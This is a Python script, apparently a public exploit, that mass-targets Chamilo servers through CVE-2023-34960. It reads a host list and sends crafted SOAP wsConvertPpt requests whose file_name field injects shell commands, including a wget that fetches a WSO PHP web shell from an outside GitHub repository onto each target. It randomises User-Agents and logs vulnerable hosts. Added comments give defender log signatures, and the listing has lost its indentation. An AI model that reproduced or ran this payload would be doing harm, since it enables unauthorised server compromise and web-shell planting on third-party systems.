import requests
import random
import warnings
import argparse
import os
import xml.etree.ElementTree as ET
from sys import stdout, exit
from multiprocessing.dummy import Pool
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from colorama import Fore, Style, init
import time
# Suppress urllib3's InsecureRequestWarning. The requests made later in this
# file pass verify=False, so certificate problems are never surfaced to the
# operator.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# colorama: reset terminal colours automatically after every print call.
init(autoreset=True)

# Upper-case colour shortcuts (used by the interactive prompt).
FY, FG, FR, FC, FW = (
    Fore.YELLOW,
    Fore.GREEN,
    Fore.RED,
    Fore.CYAN,
    Fore.WHITE,
)

# Lower-case colour shortcuts; several of them alias the same colours as above.
fm, fb, fk, fi, fc, fp, fu = (
    Fore.RED,
    Fore.BLUE,
    Fore.YELLOW,
    Fore.GREEN,
    Fore.CYAN,
    Fore.WHITE,
    Fore.MAGENTA,
)

# Style / reset shortcuts.
sd, fr, sn, sb = Style.DIM, Fore.RESET, Style.NORMAL, Style.BRIGHT
def logo():
"""Print the tool banner to stdout, one line at a time.

Each banner line is wrapped in an ANSI bold colour escape whose colour code
is picked at random from ``colors`` and followed by the reset sequence.
"""
# ANSI "reset all attributes" sequence appended after every banner line.
clear = "\x1b[0m"
# ANSI foreground colour codes to choose from.
colors = [36, 32, 34, 35, 31, 37]
x = """
CVE-2023-34960 | Chamilo Command Injection
https://github.com/Mantodkaz
"""
# N (the line index) is never used; only the line text is written.
for N, line in enumerate(x.split("\n")):
stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
# NOTE(review): indentation is lost in this listing, so it cannot be told
# whether this pause runs once per banner line or once after the loop.
time.sleep(0.05)
def users_agents():
    """Return the non-empty, whitespace-stripped lines of ``users_agents.txt``.

    The file is opened relative to the current working directory; a missing
    file raises the usual ``OSError`` from ``open``. The returned list is the
    pool from which a random User-Agent header is drawn for every request, so
    the User-Agent seen in server logs varies between requests from this tool.
    """
    with open("users_agents.txt", "r") as handle:
        raw_lines = handle.readlines()

    cleaned = []
    for entry in raw_lines:
        candidate = entry.strip()
        # Skip blank and whitespace-only lines.
        if candidate:
            cleaned.append(candidate)
    return cleaned
def chamilo(args):
"""Send one crafted SOAP ``wsConvertPpt`` request to a host and report the result.

``args`` is a ``(url, user_agents)`` tuple: a host entry from the input list
and the list of User-Agent strings to choose from. Nothing is returned; the
outcome is printed and, on a positive result, appended to ``resultVULN.txt``.

This is not a passive check. The ``file_name`` value in the request body
carries shell metacharacters followed by commands, including a ``wget`` of
a remote PHP file, so a host that processes the request is modified by it.

Reviewer notes for defenders:
  * Log signature: POST to ``/main/webservices/additional_webservices.php``
    with a ``wsConvertPpt`` body whose ``file_name`` contains backticks,
    pipes or semicolons. The User-Agent is randomised per request and is
    not a reliable indicator.
  * Host-side follow-up: an outbound fetch by the web server process and an
    unexpected ``wso.php`` in the directory that ``pwd`` reports.
  * Mitigation: apply the vendor fix for the CVE named in this file's
    banner and restrict access to the web-services endpoint.
"""
url, user_agents = args
# Always plain HTTP; only "/" characters at either end of the entry are stripped.
url = "http://" + url.strip("/")
# SOAP envelope for the wsConvertPpt operation. The target URL is reused as
# the ns1 namespace; "{{}}" in the f-string yields a literal "{}".
body = f'''<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{url}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns1:wsConvertPpt>
<param0 xsi:type="ns2:Map">
<item>
<key xsi:type="xsd:string">file_data</key>
<value xsi:type="xsd:string"></value>
</item>
<item>
<key xsi:type="xsd:string">file_name</key>
<value xsi:type="xsd:string">`{{}}`.pptx'|" |uname -a;pwd;wget https://raw.githubusercontent.com/Mantodkaz/bekdur/main/php/wso.php||a #</value>
</item>
<item>
<key xsi:type="xsd:string">service_ppt2lp_size</key>
<value xsi:type="xsd:string">720x540</value>
</item>
</param0>
</ns1:wsConvertPpt>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>'''
# A different User-Agent is drawn from the pool for every request.
headers = {'Content-Type': 'text/xml', 'User-Agent': random.choice(user_agents)}
try:
# verify=False has no effect on the http:// URL built above; it would only
# matter if a redirect led to HTTPS. The request is abandoned after 5 seconds.
r = requests.post(f'{url}/main/webservices/additional_webservices.php', data=body, headers=headers, verify=False, timeout=5)
# A positive result requires HTTP 200 and the SOAP response element name in the body.
if r.status_code == 200 and "wsConvertPptResponse" in r.text:
# NOTE(review): the response comes from an untrusted remote host and is
# parsed with the standard-library ElementTree parser.
vuln = ET.fromstring(r.text)
tagged = vuln.find('.//return')
if tagged is not None:
# The text of <return> is stored verbatim next to the URL.
content = tagged.text
with open('resultVULN.txt', 'a') as o:
o.write(url + ' | wso.php | ' + content + '\n')
print(url + ' \033[0;37;42mVULNN!!!{}'.format(fp))
# NOTE(review): indentation is lost in this listing, so it is unclear whether
# this else pairs with the status/body check or with the <return> lookup.
else:
print(url + ' \033[0;37;41mNOT VULN!{}'.format(fp))
# The bare except reports every failure (timeout, connection error, malformed
# XML, an empty <return>) as "NOT VULN", so that output is not evidence that
# a host is patched.
except:
print(url + " \033[0;37;41mNOT VULN!{}".format(fp))
# Script entry point: prompt for a host-list file, then run chamilo() against
# every entry from a pool of worker threads.
if __name__ == '__main__':
logo()
# The list path is read interactively, before any command-line parsing, so
# options such as -h only take effect after this prompt has been answered.
web = input('{}[>] {}List {}>{} '.format(FY, FG, FY, Style.RESET_ALL))
time.sleep(1)
try:
with open(web, 'r') as o:
# One host entry per line.
oh = o.read().splitlines()
oh = list(oh)
except IOError:
# NOTE(review): this file imports only `stdout` and `exit` from sys; the
# name `sys` itself is not imported here.
sys.exit()
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--threads", type=int, default=10, help="Maximum number of concurrent threads")
args = parser.parse_args()
max_workers = args.threads
user_agents = users_agents()
# Every host entry is paired with the same User-Agent pool.
args_list = [(url, user_agents) for url in oh]
# multiprocessing.dummy.Pool is a thread pool; map() blocks until every entry
# has been processed. The pool is never closed or joined explicitly.
lel = Pool(max_workers)
lel.map(chamilo, args_list)